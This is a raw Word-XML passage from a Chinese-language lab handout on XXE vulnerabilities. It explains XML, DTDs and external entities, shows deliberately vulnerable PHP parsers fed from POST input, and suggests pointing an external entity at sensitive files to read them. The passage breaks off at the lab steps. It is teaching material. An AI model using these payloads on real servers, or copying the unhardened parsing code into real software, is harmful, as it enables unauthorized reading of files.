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XXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞实验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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实验目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>熟悉X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这门语言的基本语法、用途</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>熟悉</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的成因</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了解X</w:t>
      </w:r>
      <w:r>
        <w:t>XE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的利用及危害</w:t>
      </w:r>
    </w:p>
    <w:p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实验要求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的基本语法和用途</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学会分析和利用基本的X</w:t>
      </w:r>
      <w:r>
        <w:t>XE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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实验准备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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xml简介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>可扩展标记语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>XML是一种非常流行的标记语言，在1990年代后期首次标准化，并被无数的软件项目所采用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>它用于配置文件</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>文档格式</w:t>
      </w:r>
      <w:r>
        <w:t>（如OOXML，ODF，PDF，RSS，...），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>图像格式</w:t>
      </w:r>
      <w:r>
        <w:t>（SVG，EXIF标题）和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>网络协议</w:t>
      </w:r>
      <w:r>
        <w:t>（WebDAV，CalDAV，XMLRPC，SOAP，XMPP，SAML， XACML，...），他应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>如此普遍以至于他出现的任何问题都会带来灾难性的结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基础知识</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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在浏览器中查看一个X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.w3school.com.cn/example/xmle/note.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3215640" cy="13258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在</w:t>
      </w:r>
      <w:r>
        <w:t>XML文档中，所有的元素都必须正确的嵌套，形成树形结构。并且整个XML文档中必须要有一个根元素。如上代码，&lt;note&gt;是整个文档的根元素。嵌套在note标签中的&lt;to&gt;和&lt;from&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>则是根的子元素。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文档中使用&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>!--  --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行注释。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时，所有的</w:t>
      </w:r>
      <w:r>
        <w:t>XML元素都必须有关闭标签，这点不像html语法那样松散。如果缺失关闭标签，则会导致XML解析失败。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr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在浏览器中查看带有一个错误的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XML 文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.w3school.com.cn/example/xmle/note_error.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1424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提示X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析错误：非配对的标签。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看页面源代码可以看到完整的X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="13868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3.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>XML 文档有自己的一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>格式规范</w:t>
      </w:r>
      <w:r>
        <w:t>，这个格式规范是由一个叫做 DTD（document type definition） 的东西控制的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。简单地说，</w:t>
      </w:r>
      <w:r>
        <w:t>DTD的作用是定义XML文档的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>合法构建模块</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>基本格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：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&lt;!DOCTYPE 根元素名 [  元素描述   ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>示例代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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&lt;?xml version="1.0"?&gt;//这一行是 XML 文档定义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&lt;!DOCTYPE message [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>根元素名为message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&lt;!ELEMENT message (receiver ,sender ,header ,msg)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="11"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//元素描述，message拥有哪些子标签元素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&lt;!ELEMENT receiver (#PCDATA)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//对子标签元素的数据类型定义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&lt;!ELEMENT sender (#PCDATA)&gt;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&lt;!ELEMENT header (#PCDATA)&gt;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 xml:space="preserve">&lt;!ELEMENT msg (#PCDATA)&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr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在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTD 中定义实体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>实体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：对应</w:t>
      </w:r>
      <w:r>
        <w:t>XML 标签中的内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，X</w:t>
      </w:r>
      <w:r>
        <w:t>ML 中除了标签以外，还需要有些内容是固定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>基本格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：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&lt;!ENTITY 实体名称 "实体的值"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE foo [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//根元素名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>foo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&lt;!ELEMENT foo ANY &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//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元素描述，定义元素为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ANY 说明接受任何元素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&lt;!ENTITY xxe "test" &gt; ]&gt;</w:t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rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//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定义实体xxe，其内容固定为字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”test”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实体其实可以看成一个变量，到时候我们可以在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XML 中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>通过 &amp; 符号</w:t>
      </w:r>
      <w:r>
        <w:t>进行引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.2.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部实体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>DTD和XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>放在同一份文档中</w:t>
      </w:r>
      <w:r>
        <w:t>，利用DTD定义的实体即为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>内部实体</w:t>
      </w:r>
      <w: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 xml:space="preserve">&lt;?xml version="1.0" encoding="UTF-8"?&gt;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 xml:space="preserve">&lt;!DOCTYPE foo [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 xml:space="preserve">    &lt;!ENTITY xxe "Hello World!"&gt;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 xml:space="preserve">]&gt;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&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地新建该X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档，使用浏览器访问</w:t>
      </w:r>
      <w:r>
        <w:t>，&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:r>
        <w:t>;会被解析为Hello World!并输出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2156460" cy="480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3.2.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外部实体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实体可以从外部的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dtd 文件中引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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&lt;!DOCTYPE foo [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&lt;!ELEMENT foo ANY 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&lt;!ENTITY xxe SYSTEM "file:///c:/test.dtd" &gt;]&gt;</w:t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rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//file协议加载文件内容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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF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 xml:space="preserve">    &lt;user&gt;&amp;xxe;&lt;/user&gt;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 xml:space="preserve">    &lt;pass&gt;mypass&lt;/pass&gt;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shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样对引用资源（test</w:t>
      </w:r>
      <w:r>
        <w:t>.dtd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）所做的任何更改都会在文档中自动更新</w:t>
      </w:r>
      <w:r>
        <w:t>,非常方便（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>方便永远是安全的敌人</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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环境介绍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供在线实验环境地址：</w:t>
      </w:r>
      <w:r>
        <w:t>http://47.112.16.34:22290/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web文件目录结构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├──</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dom.php</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t># 示例：使用DOMDocument解析body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├──</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> index.php</w:t>
      </w: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phpinfo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├──</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> noecho</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w: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目录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│  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ├── dom.php</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t># 示例：使用DOMDocument解析body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│  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ├── index.php</w:t>
      </w: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phpinfo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│  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ├── SimpleXMLElement.php</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t># 示例：使用SimpleXMLElement类解析body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│  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> └── simplexml_load_string.php</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t># 示例：使用simplexml_load_string函数解析body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├──</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SimpleXMLElement.php</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t># 示例：使用SimpleXMLElement类解析body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└──</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> simplexml_load_string.php</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t># 示例：使用simplexml_load_string函数解析body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根目录下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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&lt;?php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$data = file_get_contents('php://input');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$dom = new DOMDocument();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$dom-&gt;loadXML($data);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print_r($dom);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SimpleXMLElement.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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&lt;?php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$data = file_get_contents('php://input');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$xml = new SimpleXMLElement($data);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echo $xml-&gt;name;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>simplexml_load_string.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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&lt;?php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$data = file_get_contents('php://input');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$xml = simplexml_load_string($data);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echo $xml-&gt;name;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>noecho目录下的php文件为去掉上述文件最后一行的echo</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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X</w:t>
      </w:r>
      <w:r>
        <w:t>XE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的成因</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当看到前面这段代码的时候，有一点安全意识的小伙伴应该隐隐约约能觉察出什么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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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&lt;!DOCTYPE foo [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&lt;!ELEMENT foo ANY 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&lt;!ENTITY xxe SYSTEM "file:///c:/test.dtd" &gt;]&gt;</w:t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shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//file协议加载文件内容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&lt;foo&gt;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 xml:space="preserve">    &lt;user&gt;&amp;xxe;&lt;/user&gt;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 xml:space="preserve">    &lt;pass&gt;mypass&lt;/pass&gt;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&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>既然能通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>外部实体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dtd 那我们是不是能将路径换一换，换成敏感文件的路径，然后把敏感文件读出来？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞成因：在对非安全的外部实体数据进行处理时而引发安全漏洞问题。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p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有回显的X</w:t>
      </w:r>
      <w:r>
        <w:t>XE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞读取文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以实验环境网站根目录下的</w:t>
      </w:r>
      <w:r>
        <w:t>simplexml_load_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.php为例：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&lt;?php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$data = file_get_contents('php://input');</w:t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rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//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从P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
